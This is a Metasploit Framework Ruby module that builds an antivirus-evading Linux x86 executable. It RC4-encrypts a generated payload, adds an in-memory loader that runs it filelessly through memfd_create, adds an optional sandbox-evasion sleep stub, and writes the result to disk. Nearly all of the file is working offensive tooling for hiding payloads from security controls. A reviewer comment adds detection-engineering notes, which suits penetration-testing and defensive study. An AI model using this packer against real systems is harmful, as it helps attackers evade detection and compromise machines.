GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/evasion/linux/x86/rc4_packer.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Evasion module that writes a packed x86 Linux ELF to disk.
#
# The build pipeline visible in #run is: generated payload -> inner ELF ->
# loader stub + inner ELF -> RC4 decrypter wrapper -> optional sleep stub ->
# outer ELF. The stub generators come from the three mixins included below;
# their internals are not part of this file.
#
# NOTE(review): for detection engineering, the module description states that
# the inner ELF is RC4-encrypted at rest and run through memfd_create, so a
# static signature on the inner payload is not expected to match the output
# file. Runtime telemetry on memfd_create and on execution of the resulting
# anonymous file descriptor looks like the more reliable signal. Confirm
# against the mixin sources.
class MetasploitModule < Msf::Evasion

  include Msf::Payload::Linux::X86::Rc4Decrypter
  include Msf::Payload::Linux::X86::ElfLoader
  include Msf::Payload::Linux::X86::SleepEvasion

  # Declares the module metadata and its two datastore options.
  #
  # @param info [Hash] metadata supplied by the framework, merged with the
  #   values below through update_info
  def initialize(info = {})
    module_info = {
      'Name' => 'Linux RC4 Packer with In-Memory Execution (x86)',
      'Description' => %q{
        This evasion module packs Linux payloads using RC4 encryption
        and executes them from memory using memfd_create for fileless execution.

        The evasion module works on systems with Linux Kernel 3.17+ due to memfd_create support.

        Features:
        - RC4 encryption with configurable key size
        - Fileless execution via memfd_create
      },
      'Author' => ['Massimo Bertocchi'],
      'License' => MSF_LICENSE,
      'Platform' => 'linux',
      'Arch' => [ARCH_X86],
      'Targets' => [['Linux x86', {}]],
      'DefaultTarget' => 0
    }
    super(update_info(info, module_info))

    # FILENAME is required (default 'payload.elf'); SLEEP_TIME is optional
    # and defaults to 0.
    module_options = [
      OptString.new('FILENAME', [true, 'Output filename', 'payload.elf']),
      OptInt.new('SLEEP_TIME', [false, 'Sleep Time for Sandbox Evasion', 0])
    ]
    register_options(module_options)
  end

  # Builds the packed ELF and writes it to the path in FILENAME.
  #
  # Aborts through fail_with(Failure::BadConfig) when the framework returns a
  # blank payload. The output file is written in binary mode and then given
  # mode 0755.
  def run
    shellcode = payload.encoded
    fail_with(Failure::BadConfig, 'Failed to generate payload') if shellcode.blank?

    # First ELF wrap: the raw payload becomes a standalone x86 ELF image.
    inner_elf = Msf::Util::EXE.to_linux_x86_elf(framework, shellcode)

    # The stubs are generated in the same order as they are laid out:
    # sleep stub first, then the decrypter wrapped around (loader + inner ELF).
    delay_stub = sleep_evasion(seconds: datastore['SLEEP_TIME'])
    loader_and_elf = in_memory_load(inner_elf) + inner_elf
    loader_code = delay_stub + rc4_decrypter(data: loader_and_elf)

    # Second ELF wrap: the combined stub code becomes the file that is written.
    packed_elf = Msf::Util::EXE.to_linux_x86_elf(framework, loader_code)

    # FILENAME is used exactly as given: a relative name resolves against the
    # current working directory, and File.binwrite replaces an existing file.
    out_path = datastore['FILENAME']
    File.binwrite(out_path, packed_elf)
    File.chmod(0o755, out_path)
  end
end